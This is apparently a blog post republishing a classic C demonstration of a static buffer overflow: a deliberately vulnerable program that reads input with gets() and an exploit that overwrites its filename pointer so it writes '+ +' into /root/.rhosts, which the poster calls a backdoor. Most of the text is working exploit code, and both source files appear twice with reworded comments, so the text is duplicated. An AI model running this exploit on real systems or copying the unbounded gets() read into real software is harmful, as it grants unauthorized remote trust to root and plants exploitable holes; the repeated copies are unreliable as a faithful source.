
Linux tmpfile-rhosts() exploit Info/PoC Code (.c)

Posted on 18th October 2011 in Codes, Exploits

Here is a rather interesting exploit. Despite the title it is not a bug in tmpfile(3) or in rhosts itself: the target program (vulprog1.c below) reads a line with gets() into a 16-byte static buffer, and the overflow overwrites the adjacent filename pointer, so the line is written to a file of the attacker's choosing — the example writes "+ +" into /root/.rhosts. It is not widely used, but it could easily be driven through a netcat-style session; I won't go into that here, I will just post the code,
which is effectively a small backdoor — you be the judge. It could be called the temp-rhosts bug, but since it is fairly trivial to exploit I'll leave the naming to you!

// vulprog1.c -- the deliberately vulnerable TARGET program (not the exploit).
// READ the notes in exploit1.c below; they explain how the overflow line is laid out and used.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

#define ERROR -1
#define BUFSIZE 16
/*
* Run this vulprog as root or change the "vulfile" to something else.
* Otherwise, even if the exploit works, it won't have permission to
* overwrite /root/.rhosts (the default "example").
*/
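/*
 * Deliberately vulnerable target (vulprog1.c).
 *
 * Reads one line from stdin into a BUFSIZE (16) byte static buffer with
 * gets(), which performs no bounds check, then writes that line to the file
 * named by the pointer `tmpfile`.  Both `buf` and `tmpfile` are static, so a
 * line longer than BUFSIZE runs past `buf` into whatever the toolchain placed
 * next to it; exploit1.c relies on that being `tmpfile` and replaces the
 * pointer with the address of argv[1] (e.g. "/root/.rhosts"), so the line
 * lands in an attacker-chosen file.
 *
 * argv[1] is not read by this program; it only has to exist so that the path
 * string is present in the process's memory.  Exit status is ERROR (-1) on a
 * usage error or when the output file cannot be opened or flushed.
 *
 * The gets() call IS the demonstrated bug and is left in on purpose.  Only the
 * broken "\n" escapes in the messages were repaired.
 *
 * NOTE(review): whether `tmpfile` really sits right after `buf` in memory is
 * a compiler/linker layout detail and is not guaranteed; confirm with a
 * debugger before assuming the 16-byte DIFF that exploit1.c hard-codes.
 */
int main(int argc, char **argv) {
    FILE *out;
    /* Kept as one declaration so the relative placement matches the original;
     * `tmpfile` shadows tmpfile(3) here - it is just a filename pointer. */
    static char buf[BUFSIZE], *tmpfile;

    if (argc <= 1) {
        fprintf(stderr, "Usage: %s <garbage>\n", argv[0]);
        exit(ERROR);
    }

    tmpfile = "/tmp/vulprog.tmp"; /* fixed path: not a tempfile(3)/race bug */
    printf("before: tmpfile = %s\n", tmpfile);
    printf("Enter one line of data to put in %s: ", tmpfile);

    /* INTENTIONAL VULNERABILITY: unbounded read into a 16-byte static buffer.
     * Anything past BUFSIZE bytes overwrites adjacent static storage. */
    gets(buf);

    /* If the overflow reached the pointer, this now shows the injected path. */
    printf("\nafter: tmpfile = %s\n", tmpfile);

    out = fopen(tmpfile, "w");
    if (out == NULL) {
        fprintf(stderr, "error opening %s: %s\n", tmpfile, strerror(errno));
        exit(ERROR);
    }
    fputs(buf, out);
    /* fclose flushes; a failed flush means the line never reached the file. */
    if (fclose(out) != 0) {
        fprintf(stderr, "error writing %s: %s\n", tmpfile, strerror(errno));
        exit(ERROR);
    }
    return 0;
}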

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

#define ERROR -1
#define BUFSIZE 16

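/*
 * vulprog1.c, second copy of the deliberately vulnerable target.
 *
 * Behaviour: prompt for one line, read it with gets() into a 16-byte static
 * buffer, then write it to the file named by the static pointer `tmpfile`.
 * Because gets() has no length limit, an over-long line spills out of `buf`
 * into the static storage next to it - which exploit1.c assumes is the
 * `tmpfile` pointer - so the attacker picks the destination file.
 *
 * argv[1] is ignored apart from the argc check; exploit1.c passes the target
 * path there only so it exists somewhere in this process's memory.
 * Exits with ERROR (-1) on bad usage or when the file cannot be opened or
 * flushed; otherwise returns 0.
 *
 * The gets() call is the bug being demonstrated and is deliberately kept.
 * The only behavioural repair is restoring the "\n" escapes the messages lost.
 *
 * NOTE(review): the adjacency of `buf` and `tmpfile` is a layout accident,
 * not a language guarantee - check it in a debugger on the toolchain in use.
 */
int main(int argc, char **argv) {
    FILE *dest;
    /* Single declaration retained on purpose; `tmpfile` shadows tmpfile(3). */
    static char buf[BUFSIZE], *tmpfile;

    if (argc <= 1) {
        fprintf(stderr, "Usage: %s <garbage>\n", argv[0]);
        exit(ERROR);
    }

    tmpfile = "/tmp/vulprog.tmp"; /* a fixed path, so no tempfile race here */
    printf("before: tmpfile = %s\n", tmpfile);
    printf("Enter one line of data to put in %s: ", tmpfile);

    /* INTENTIONAL VULNERABILITY: no bound on the input length. */
    gets(buf);

    /* Shows the (possibly overwritten) pointer after the read. */
    printf("\nafter: tmpfile = %s\n", tmpfile);

    dest = fopen(tmpfile, "w");
    if (dest == NULL) {
        fprintf(stderr, "- error opening %s: %s\n", tmpfile, strerror(errno));
        exit(ERROR);
    }
    fputs(buf, dest);
    /* Check the flush performed by fclose on this write stream. */
    if (fclose(dest) != 0) {
        fprintf(stderr, "- error writing %s: %s\n", tmpfile, strerror(errno));
        exit(ERROR);
    }
    return 0;
}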

/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* This will exploit vulprog1.c. It passes some arguments to the
* program (that the vulnerable program doesn't use). The vulnerable
* program expects us to enter one line of input to be stored
* temporarily. However, because of a static buffer overflow, we can
* overwrite the temporary filename pointer, to have it point to
* argv[1] (which we could pass as "/root/.rhosts"). Then it will
* write our temporary line to this file. So our overflow string (what
* we pass as our input line) will be:
* "+ +\t# ", padded with 'A' out to (tmpfile addr - buf addr) bytes, then the argv[1] address
*
* We use "+ +" (all hosts), followed by '#' (comment indicator), to
* prevent our "attack code" from causing problems. Without the
* "#", programs using .rhosts would misinterpret our attack code.
*
* Compile as: gcc -o exploit1 exploit1.c  (on a 64-bit host add -m32: getesp() and the 4-byte address in the payload assume i386)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFSIZE 256
#define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */
#define VULPROG "./vulprog1"
#define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */

/* get value of sp off the stack (used to calculate argv[1] address) */
/*
 * Returns an approximation of the current stack pointer.
 *
 * There is no C `return` statement: the inline asm copies %esp into %eax and
 * the function relies on %eax being the integer return register of the i386
 * calling convention.  Falling off the end of a non-void function and using
 * the result is undefined behaviour in C, so this only happens to work on
 * 32-bit x86 and may break under optimisation.  On x86-64 the instruction
 * still assembles but would at best yield the low 32 bits of %rsp.
 * NOTE(review): build with -m32 (and ideally -O0), or rewrite with an asm
 * output operand plus a real `return`, before trusting the value.
 */
u_long getesp() {
__asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */
}

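/*
 * Build the overflow line for vulprog1 and feed it through the shell.
 *
 * Payload layout (see the header comment): "+ +\t# " so .rhosts readers treat
 * the rest of the line as a comment, 'A' filler out to DIFF bytes, then the
 * little-endian address that should replace vulprog1's `tmpfile` pointer.
 * That address is getesp() + argv[1]: the offset is the user's guess at where
 * argv[1] ("/root/.rhosts") sits on vulprog1's stack relative to our own sp.
 *
 * argv[1]: decimal stack offset (the usage text suggests 310-330).
 * Returns 0 after running the command.  Exits EXIT_FAILURE on bad usage, a
 * non-numeric offset, an allocation failure, or a pointer size the fixed
 * payload layout cannot hold.  (The original called exit(ERROR) with ERROR
 * defined only in vulprog1.c, so it did not compile stand-alone.)
 *
 * Fixes over the original: "\n"/"\t" escapes restored, `i` declared, the
 * command buffer sized exactly instead of memset to sizeof(char *), malloc
 * checked, %p no longer fed an integer, 32-bit pointer assumption checked.
 *
 * Unchanged assumptions: 32-bit little-endian x86, a 16-byte gap between
 * `buf` and `tmpfile` in vulprog1, and an address with no NUL, ' or newline
 * byte (any of those breaks the single-quoted echo or truncates the line).
 */
int main(int argc, char **argv) {
    unsigned long addr;
    char payload[DIFF + 6 + 1]; /* "+ +\t# " + DIFF filler bytes + NUL */
    const char *fmt = "echo '%s' | %s %s\n";
    char *cmd;
    char *end;
    long offset;
    int need;
    size_t i;

    if (argc <= 1) {
        fprintf(stderr, "Usage: %s <offset> [try 310-330]\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    /* strtol rather than atoi: a non-numeric offset is an error, not 0. */
    offset = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0') {
        fprintf(stderr, "%s: offset must be a decimal integer\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    /* The address goes at payload[DIFF..DIFF+sizeof addr) and must stay inside
     * the buffer; with 8-byte pointers it would not. */
    if (DIFF + sizeof addr > sizeof payload - 1) {
        fprintf(stderr, "%s: payload layout assumes 4-byte pointers (this build has %lu)\n",
                argv[0], (unsigned long)sizeof addr);
        exit(EXIT_FAILURE);
    }

    memset(payload, 0, sizeof payload);
    strcpy(payload, "+ +\t# ");
    memset(payload + strlen(payload), 'A', DIFF);

    addr = getesp() + (unsigned long)offset;
    /* Little-endian: least significant byte first. */
    for (i = 0; i < sizeof addr; i++) {
        payload[DIFF + i] = (char)((addr >> (i * 8)) & 0xff);
    }

    if (strchr(payload, '\'') != NULL || strchr(payload, '\n') != NULL) {
        fprintf(stderr, "[-] warning: address contains ' or newline; the shell quoting below will break\n");
    }

    /* Size the command exactly from the format rather than guessing. */
    need = snprintf(NULL, 0, fmt, payload, VULPROG, VULFILE);
    if (need < 0) {
        fprintf(stderr, "%s: could not format command\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    cmd = malloc((size_t)need + 1);
    if (cmd == NULL) {
        fprintf(stderr, "%s: out of memory\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    snprintf(cmd, (size_t)need + 1, fmt, payload, VULPROG, VULFILE);

    printf("[+] Overflowing tmpaddr to point to %#lx, check %s after.\n\n", addr, VULFILE);
    /* system() is needed for the pipe; every piece of the command is our own constant. */
    system(cmd);
    free(cmd);
    return 0;
}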

/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* This will exploit vulprog1.c. It passes some arguments to the
* program (that the vulnerable program doesn't use). The vulnerable
* program expects us to enter one line of input to be stored
* temporarily. However, because of a static buffer overflow, we can
* overwrite the temporary filename pointer, to have it point to
* argv[1] (which we could pass as "/root/.rhosts"). Then it will
* write our temporary line to this file. So our overflow string (what
* we pass as our input line) will be:
* "+ +\t# ", padded with 'A' out to (tmpfile addr - buf addr) bytes, then the argv[1] address
*
* We use "+ +" (all hosts), followed by '#' (comment indicator), to
* prevent our "attack code" from causing problems. Without the
* "#", programs using .rhosts would misinterpret our attack code.
*
* Compile as: gcc -o exploit1 exploit1.c  (on a 64-bit host add -m32: getesp() and the 4-byte address in the payload assume i386)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFSIZE 256
#define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */
#define VULPROG "./vulprog1"
#define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */

/* get value of sp off the stack (used to calculate argv[1] address) */
/*
 * Reads the stack pointer; used as the base for the argv[1] address guess.
 *
 * No `return` is written: the asm moves %esp into %eax and the caller gets
 * whatever is in %eax, i.e. this depends on the i386 convention of returning
 * integers in %eax.  In C that is undefined behaviour (non-void function with
 * no return), so treat it as i386-only and sensitive to optimisation; on
 * x86-64 the same instruction assembles but cannot return a full pointer.
 * NOTE(review): compile with -m32, or convert to an asm output operand with
 * an explicit `return`, before depending on the result.
 */
u_long getesp() {
__asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */
}

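/*
 * exploit1.c entry point, second copy: construct the overflow line and run
 * vulprog1 with it on stdin.
 *
 * The line is "+ +\t# " (so .rhosts parsers see a comment after the wildcard),
 * 'A' padding up to DIFF bytes, then the little-endian bytes of
 * getesp() + argv[1], which is meant to overwrite vulprog1's `tmpfile`
 * pointer with the address of its argv[1] ("/root/.rhosts").
 *
 * argv[1]: decimal stack offset to add to our stack pointer (try 310-330).
 * Returns 0 after the command has been run.  Exits EXIT_FAILURE for a missing
 * or non-numeric offset, an allocation failure, or a pointer size the fixed
 * payload layout cannot hold.  (ERROR, used by the original, is only defined
 * in vulprog1.c, so that exit did not compile on its own.)
 *
 * Repairs over the original: the loop index was declared as `I` but used as
 * `i`; "\n"/"\t" escapes restored; the command buffer was memset with
 * sizeof(char *) and its malloc unchecked; %p received an integer.
 *
 * Still assumed, as in the original: i386 little-endian, a 16-byte DIFF in
 * vulprog1, and no NUL, ' or newline byte in the address.
 */
int main(int argc, char **argv) {
    unsigned long target;
    char line[DIFF + 6 + 1]; /* prefix + DIFF bytes + NUL */
    const char *shell_fmt = "echo '%s' | %s %s\n";
    char *command;
    char *stop;
    long delta;
    int length;
    size_t k;

    if (argc <= 1) {
        fprintf(stderr, "Usage: %s <offset> [try 310-330]\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    /* Reject garbage offsets instead of silently treating them as 0. */
    delta = strtol(argv[1], &stop, 10);
    if (stop == argv[1] || *stop != '\0') {
        fprintf(stderr, "%s: offset must be a decimal integer\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    /* Address bytes are placed at line[DIFF..]; they must end before the NUL. */
    if (DIFF + sizeof target > sizeof line - 1) {
        fprintf(stderr, "%s: payload layout assumes 4-byte pointers (this build has %lu)\n",
                argv[0], (unsigned long)sizeof target);
        exit(EXIT_FAILURE);
    }

    memset(line, 0, sizeof line);
    strcpy(line, "+ +\t# ");
    memset(line + strlen(line), 'A', DIFF);

    target = getesp() + (unsigned long)delta;
    /* Emit the address least-significant byte first (little endian). */
    for (k = 0; k < sizeof target; k++) {
        line[DIFF + k] = (char)((target >> (k * 8)) & 0xff);
    }

    if (strchr(line, '\'') != NULL || strchr(line, '\n') != NULL) {
        fprintf(stderr, "[-] warning: address contains ' or newline; the shell quoting below will break\n");
    }

    /* Measure first, then allocate exactly what the command needs. */
    length = snprintf(NULL, 0, shell_fmt, line, VULPROG, VULFILE);
    if (length < 0) {
        fprintf(stderr, "%s: could not format command\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    command = malloc((size_t)length + 1);
    if (command == NULL) {
        fprintf(stderr, "%s: out of memory\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    snprintf(command, (size_t)length + 1, shell_fmt, line, VULPROG, VULFILE);

    printf("Overflowing tmpaddr to point to %#lx, check %s after.\n\n", target, VULFILE);
    /* The pipe needs a shell; nothing in the command comes from outside this program. */
    system(command);
    free(command);
    return 0;
}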

Enjoy!